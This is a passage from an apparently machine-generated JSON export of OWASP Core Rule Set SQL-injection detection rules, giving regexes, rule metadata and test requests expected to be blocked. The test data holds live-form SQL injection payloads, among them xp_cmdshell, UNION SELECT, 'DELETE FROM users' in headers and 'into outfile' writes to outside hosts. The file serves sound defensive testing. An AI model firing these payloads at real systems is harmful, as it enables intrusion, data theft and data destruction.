rsion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\\(", "actions": [ { "act_name": "id", "lineno": 1201, "act_quote": "no_quote", "act_arg": "942410", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1202, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1203, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1204, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1205, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1205, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1206, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1207, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1208, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1209, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1210, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1211, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1212, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1213, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1214, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1215, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1216, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1217, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1218, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1219, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1200 } }, { "rule_id": "942470", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=nvarchar" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=nvarchar" } ] }, { "description": "SQL Injection Attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=xp_cmdshell" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=xp_cmdshell" } ] }, { "description": "SQL Injection Attack", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=varchar" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=varchar" } ] }, { "description": "SQL Injection Attack", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=xp_dirtree" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=xp_dirtree" } ] }, { "description": "SQL Injection Attack", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=xp_regread" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=xp_regread" } ] }, { "description": "SQL Injection Attack", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=sp_password" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=sp_password" } ] }, { "description": "SQL Injection Attack", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=UTL_HTTP" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=UTL_HTTP" } ] }, { "description": "SQL Injection Attack", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=OPENROWSET" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=OPENROWSET" } ] }, { "description": "SQL Injection Attack", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=sp_executesql" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=sp_executesql" } ] }, { "description": "SQL Injection Attack", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "sp_executesql" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "post_body", "value": "sp_executesql" } ] }, { "description": "SQL Injection Attack: current_user", "test_id": 11, "request": { "method": "GET", "uri": "/get/index.php?id=1%2bcurrent_user::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942470 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=1%2bcurrent_user::int" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1229, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)", "actions": [ { "act_name": "id", "lineno": 1230, "act_quote": "no_quote", "act_arg": "942470", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1231, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1232, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1233, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1234, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1234, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1235, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1236, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1237, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1238, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1239, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1240, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1241, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1242, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1243, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1244, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1245, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1246, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1247, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1248, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1229 } }, { "rule_id": "942480", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\\.|elete\\b[^0-9A-Z_a-z]*?\\bfrom)|(?:group\\b.*?\\bby\\b.{1,100}?\\bhav|overlay\\b[^0-9A-Z_a-z]*?\\(.*?\\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\\b[^0-9A-Z_a-z]*?\\bjoin|sert\\b[^0-9A-Z_a-z]*?\\binto|to\\b[^0-9A-Z_a-z]*?\\b(?:dump|out)file)|load\\b[^0-9A-Z_a-z]*?\\bdata\\b.*?\\binfile|s(?:elect\\b.{1,100}?\\b(?:(?:.*?\\bdump\\b.*|(?:count|length)\\b.{1,100}?)\\bfrom|(?:data_typ|from\\b.{1,100}?\\bwher)e|instr|to(?:_(?:cha|numbe)r|p\\b.{1,100}?\\bfrom))|ys_context)|u(?:nion\\b.{1,100}?\\bselect|tl_inaddr))\\b|print\\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\\(a|@@version|;[^0-9A-Z_a-z]*?\\b(?:drop|shutdown))\\b|'(?:dbo|msdasql|s(?:a|qloledb))'", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "GET", "uri": "/get?'msdasql'", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "'msdasql'" } ] }, { "description": "SQL Injection Attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "Cookie": "'msdasql'", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [] }, { "description": "Data dump using 'into outfile'", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" } ] }, { "description": "Data dump using 'into outfile'", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" } ] }, { "description": "SQL injection using 'UNION ALL", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=0.3480567293179807' UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=0.3480567293179807' UNION ALL select NULL --" } ] }, { "description": "SQL injection using 'UNION ALL", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=config.ini\") UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=config.ini\") UNION ALL select NULL --" } ] }, { "description": "SQL injection using 'UNION ALL", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=CRS) UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=CRS) UNION ALL select NULL --" } ] }, { "description": "SQL injection using 'UNION ALL", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=CRS3\") UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=CRS3\") UNION ALL select NULL --" } ] }, { "description": "SQL injection using 'overlay(...placing..)", "test_id": 9, "request": { "method": "GET", "uri": "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" } ] }, { "description": "SQL injection in User-Agent", "test_id": 10, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "DELETE FROM users;--", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [] }, { "description": "SQL injection in arbitrary header", "test_id": 11, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "SomeHeader": "DELETE FROM users;--", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [] }, { "description": "SQL injection using 'overlay(...placing..) with newlines", "test_id": 12, "request": { "method": "GET", "uri": "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942480 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1258, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\\.|elete\\b[^0-9A-Z_a-z]*?\\bfrom)|(?:group\\b.*?\\bby\\b.{1,100}?\\bhav|overlay\\b[^0-9A-Z_a-z]*?\\(.*?\\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\\b[^0-9A-Z_a-z]*?\\bjoin|sert\\b[^0-9A-Z_a-z]*?\\binto|to\\b[^0-9A-Z_a-z]*?\\b(?:dump|out)file)|load\\b[^0-9A-Z_a-z]*?\\bdata\\b.*?\\binfile|s(?:elect\\b.{1,100}?\\b(?:(?:.*?\\bdump\\b.*|(?:count|length)\\b.{1,100}?)\\bfrom|(?:data_typ|from\\b.{1,100}?\\bwher)e|instr|to(?:_(?:cha|numbe)r|p\\b.{1,100}?\\bfrom))|ys_context)|u(?:nion\\b.{1,100}?\\bselect|tl_inaddr))\\b|print\\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\\(a|@@version|;[^0-9A-Z_a-z]*?\\b(?:drop|shutdown))\\b|'(?:dbo|msdasql|s(?:a|qloledb))'", "actions": [ { "act_name": "id", "lineno": 1259, "act_quote": "no_quote", "act_arg": "942480", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1260, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1261, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1262, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1263, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1263, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1264, "act_quote": "quotes", "act_arg": "SQL Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1265, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1266, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1267, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1268, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1269, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1270, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1271, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1272, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1273, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1274, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1275, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1276, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1277, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1258 } }, { "rule_id": "942430", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){12})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)", "logdata": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Restricted SQL 